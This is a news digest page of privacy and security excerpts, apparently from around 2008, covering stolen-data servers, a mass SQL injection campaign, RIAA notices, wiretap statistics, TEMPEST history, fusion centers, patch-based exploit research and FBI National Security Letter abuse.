Privacy Digest

Web firm sounds alert on criminal data trove - Via Reuters:

LONDON (Reuters) - A Web security firm said on Tuesday it had tipped off international banks and police after finding a huge trove of stolen business and personal data amassed on a server in the space of just three weeks.

Finjan Inc said it had notified the U.S. Federal Bureau of Investigation, police in various countries and more than 40 financial institutions in the United States, Europe and India about the discovery of the so-called "crimeserver".

"This server was running for about three weeks and within this period it managed to collect 1.4 gigabytes of data. It is indeed the largest treasure we've found in this very short time," Yuval Ben-Itzhak, chief technology officer of the California-based firm, said in a phone interview from Israel.

The stolen data consisted of 5,388 unique log files including 1,037 from Turkey, 621 from Germany, 571 from the United States, 322 from France, 308 from India and 232 from Britain.  read more »

500 Thousand MS Web Servers Hacked - Via Slashdot:

andrewd18 writes "According to F-Secure, over 500,000 webservers across the world, including some from the United Nations and UK government, have been victims of a SQL injection. The attack uses an SQL injection to reroute clients to a malicious javascript at nmidahena.com, aspder.com or nihaorr1.com, which use another set of exploits to install a Trojan on the client's computer. As per usual, Firefox users with NoScript should be safe from the client exploit, but server admins should be alert for the server-side injection. Brian Krebs has a decent writeup on his Washington Post Security Blog, Dynamoo has a list of some of the high-profile sites that has been hacked, and for fun you can watch some of the IIS admins run around in circles at one of the many IIS forums on the 'net."

(Read Original Article - Via Slashdot.)

Yale Information Society Project's 9.5 Theses for Technology Policy in the Next Administration - Via CFP: Technology Policy '08:

The theme of the 18th Annual Computers, Freedom, and Privacy Conference is "Technology Policy '08." To help shape public debate in this election year, the Information Society Project at Yale Law School recommends the following policy principles - The 9.5 Theses for Technology Policy in the Next Administration:  read more »

Universities Baffled By Massive Surge In RIAA Copyright Notices - Via Threat Level:

In the last 10 days, universities around the country have seen more than a 20-fold increase in the number of filesharing takedown notices from the recording industry, in an unexplained spike that seems focused on colleges in the Midwest.

The spike is not matched by an increase in actual file sharing.

"Universities are getting as many notices from the RIAA in one day as what they would typically get from all content owners in a month," says Mark Luker, a vice president of higher education technology advocate Educause.

Indiana University says that starting on April 21, the Recording Industry Association of America began sending 80 legal notices a day to the university, under the Digital Millennium Copyright Act. Typically, the university handles less than 100 such notices a month from the RIAA, the Motion Picture Association of America and HBO combined.  read more »

Court-Approved Wiretapping Rose 14% in '07 - Via Threat Level:

Last year might have been a rough year for U.S. home prices, but growth in government wiretaps remained healthy, with the eavesdropping sector posting a 14% increase in court orders compared to 2006. In 2007, judges approved 4,578 state and federal wiretaps, as compared to 4,015 in 2006, according to two new reports on criminal and intelligence wiretaps.

Editor: Interesting graphic removed. Go to original site for that [...]

State police applied for 27% more wiretaps in 2007 than in 2006, with 94% of them targeting cell phones, according to figures released by the U.S. Courts' administrator. In 2007, state judges approved 1,751 criminal wiretap applications, without turning any of them down, according to  the report (.pdf). That's a near-three fold increase in state wiretaps since 1997. Federal criminal wiretaps remained fairly constant -- hovering around 500 -- though exact numbers aren't known since the Justice Department has begun withholding information from the administrators of the U.S. court regarding sensitive investigations.  read more »

Declassified NSA Document Reveals the Secret History of TEMPEST - Via Threat Level:

It was 1943, and an engineer with Bell Telephone was working on one of the U.S. government's most sensitive and important pieces of wartime machinery, a Bell Telephone model 131-B2. It was a top secret encrypted teletype terminal used by the Army and Navy to transmit wartime communications that could defy German and Japanese cryptanalysis.

Then he noticed something odd.

Far across the lab, a freestanding oscilloscope had developed a habit of spiking every time the teletype encrypted a letter. Upon closer inspection, the spikes could actually be translated into the plain message the machine was processing. Though he likely didn't know it at the time, the engineer had just discovered that all information processing machines send their secrets into the electromagnetic ether.  read more »

After Records Reveal E-Voting Glitches, Election Official Jokes She'll Stop Keeping Records - Via Threat Level:

Kathy Dent, the election director in Sarasota County, Florida, was the target of controversy after the 2006 election when more than 18,000 ballots cast on ES&S touch-screen voting machines in her county showed no vote cast in the 13th congressional district race. The so-called undervote rate in that race was five times what is considered normal and resulted in two lawsuits filed by voters and the defeated candidate, Christine Jennings, who lost the congressional seat by fewer than 400 votes.  read more »

AT&T Denies Resetting P2P Connections - Via Slashdot: Your Rights Online:

betaville points out comments AT&T filed with the FCC in which they denied throttling traffic by resetting P2P file-sharing connections. Earlier this week, a study published by the Vuze team found AT&T to have the 25th highest (13th highest if extra Comcast networks are excluded) median reset rate among the sampled networks. In the past, AT&T has defended Comcast's throttling practices, and said it wants to monitor its network traffic for IP violations.  read more »

Online privacy: railing against the accepted - Via Network World on Privacy:

A Pew Internet survey shows that more Internet users now accept Big Brother at work and think that information about them on the Internet is accurate.

[...]

I frequently use this column to rail against threats to the privacy of Internet users, both from government and the private sector. (For example, see last week’s column). I just found a survey published late last year by the Pew Internet & American Life Project that reports that people are coming to support, or at last not object too strongly to, some types of spying.  read more »

ACLU Says Fusion Centers Remain Problematic - Via American Civil Liberties Union:

Washington, DC – As a Senate subcommittee met today to get a "progress report" on fusion centers, the American Civil Liberties Union once again voiced its concerns with the intelligence-gathering institutions. The Senate Homeland Security and Governmental Affairs Subcommittee on State, Local, and Private Sector Preparedness and Integration heard testimony from government and intelligence officials on a recent report issued by the Government Accountability Office (GAO) regarding the centers. Though several recent reports have confirmed fusion centers’ growing role in law enforcement and revealed their expanding ties to private industry, including relationships with massive data-brokering companies, no third parties were set to testify. The ACLU released a report last year outlining serious concerns with fusion centers.

"Fusion centers have the potential to be privacy nightmares," said Caroline Fredrickson, director of the ACLU Washington Legislative Office. "Every inch of privacy we surrender gives the government a mile of latitude to invade it further. There’s simply too much we don’t know. Strict guidelines must be put in place and enforced. We urge the subcommittee and all of Congress to keep a close eye on those who are keeping a close eye on us."  read more »

Automatic Patch-Based Exploit Generation - Via cs.cmu.edu:

by David Brumley, Pongsin Poosankam, Dawn Song, and Jiang Zheng
Abstract
The automatic patch-based exploit generation problem is: given a program P and a patched version of the program P', automatically generate an exploit for the potentially unknown vulnerability present in P but fixed in P'. In this paper, we propose techniques for automatic patch-based exploit generation, and show that our techniques can automatically generate exploits for vulnerable programs based upon patches provided via Windows Update.  read more »

Windows Update Can Hurt Security - Via Slashdot >:

An anonymous reader writes
"Researchers at Carnegie Mellon University have shown that given a buggy program with an unknown vulnerability, and a patch, it is possible automatically to create an exploit for unpatched systems. They demonstrate this by showing automatic patch-based exploit generation for several Windows vulnerabilities and patches can be achieved within a few minutes of when a patch is first released. From the article: 'One important security implication is that current patch distribution schemes which stagger patch distribution over long time periods, such as Windows Update... can detract from overall security, and should be redesigned.' The full paper is available as PDF, and will appear at the IEEE Security and Privacy Symposium in May."

(Read Original Article - Via Slashdot.)

FBI General Counsel Questioned on EFF NSL Report - Via EFF: Deep Links:

At a hearing of the House Judiciary Committee today, FBI General Counsel Valerie Caproni faced tough questions about the EFF Report on the abuse of a National Security Letter (NSL) to North Carolina State University at Raleigh.

In her testimony, Caproni speculated that this misuse of the NSL might have been the result of a "miscommunication." According to a 2007 report by Caproni's Office of the General Counsel, however, the FBI Charlotte Division "acted upon the advice and direction of FBIHQ [and] Charlotte personnel sought legal advice prior to the service of the NSL." FBI documents show that the NSL at issue was reviewed by the Senior Supervisory Special Agent for the Raleigh office, and then reviewed by the Special Agent in Charge of the Atlanta Division before being signed.  read more »

EFF Issues Report on Abuse of National Security Letter - Via EFF: Deep Links:

Today, EFF published a report on the misuse of a National Security Letter to seek educational records from North Carolina State University at Raleigh in 2005. The NSL authority does not allow the government to seek educational records.

The detailed report stems from EFF's Freedom of Information Act request for records about NSL abuse. FBI documents show that, over the span of three days in July 2005, the Charlotte Division of the FBI first obtained educational records pursuant to a grand jury subpoena, and then -- at the direction of FBIHQ -- returned the records and sought them again pursuant to an improper NSL.

The improper NSL was refused by the university, but the FBI finally obtained them pursuant to a second grand jury subpoena. Later in July 2005, FBI Director Robert Mueller used the delay in obtaining these particular records as an example of why the FBI needed administrative subpoena power instead of NSLs in testimony.  read more »

EFF Report: FBI Slowed Terror Investigation with Improper NSL Request</